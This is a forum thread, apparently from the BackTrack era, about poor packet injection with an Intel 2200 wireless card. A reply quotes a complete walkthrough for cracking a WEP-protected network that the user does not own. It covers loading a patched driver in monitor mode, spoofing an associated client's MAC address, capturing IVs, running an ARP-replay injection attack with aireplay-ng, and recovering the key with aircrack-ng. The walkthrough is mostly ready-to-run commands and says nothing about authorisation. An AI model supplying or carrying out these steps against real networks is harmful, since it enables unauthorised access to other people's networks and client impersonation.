
Thread: Bad injection with Intel 2200

  1. #1
    Junior Member
    Join Date
    Oct 2006

    Bad injection with Intel 2200

    I'm working from this guide
    and I get something like 800 IVs every 30 minutes. I think that there is some injection problem, any idea why? Working with bt2final and Intel 2200.
    BilThomson, the answer is 42.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2007


    Yes, the IPW2200 is very problematic and the injection works only if you are connected to another access point on the same channel as the one you are trying to crack...

    Here you can read everything you need:
    (Look for the last answer of CValentine below...)

    Alright, I did it! Thanks for all the help I received!!!

    Since it took me so much time to get it to work on my Centrino, here's some help for all you Centrino injectors out there...

    First of all, like LatinSud wrote, Centrino IPW2200 users HAVE TO BE ASSOCIATED to ANY! AP ON THE SAME CHANNEL as the targeted one WITH NO WEP KEY set at all!!!!

    That said there are two possibilities:

    1) Either you have a second old/unused router that you set up on the same channel as the target with no encryption enabled (it doesn't have to be connected to the internet, so just plugging its power in and setting it to the channel as an open network will do the trick)


    2) You just disable the encryption on your own router for a while and maybe unplug the router from your phone line (if you care who surfs on your net as long as you're unprotected, that is... )

    After setting up this "association ready network" you do a

    $ rmmod ipw2200                   # removes your original module, internet connection will go down
    $ modprobe ipw2200 rtap_iface=1   # loads the patched driver with the monitor interface enabled
    $ airodump-ng rtap0               # will start monitoring all channels for traffic

    Once you've found a network with data traffic and an associated client (everything else won't be of any use since ipw2200 can't do a fakeauth attack to associate ourselves), remember the AP's MAC and the matching client's MAC as well as the channel they operate on.

    Now do a

    $ ifconfig eth1 down      # shuts down the interface once again to allow mac changes
    $ ifconfig eth1 hw ether <MAC of the associated client you pinned down>
    $ ifconfig eth1 up        # pretty self-explaining
    $ ifconfig rtap0 up       # brings the monitor interface up

    Now connect your eth1 interface to your unprotected "association AP", change its channel to the needed one, reconnect, then - just to make sure - do a

    $ iwconfig eth1 key off

    Here comes the fun part:

    $ airodump-ng rtap0 --ivs --bssid <MAC of your target AP> -c <Channel the AP/Client is working on> -w <Choose an output filename>

    This will constantly capture on the specified channel for just your target AP, writing only IVs to a file named as you chose.
    Since that terminal is now busy, open up another one and do a:

    $ aireplay-ng -3 -b <MAC of your target AP> -h <MAC of the associated client> -i rtap0 eth1

    Here you go... Once your captured IVs go flying high, do a

    $ aircrack-ng <Your IV output file>

    and there you are...

    Hope this clears some things up!

    Best regards,

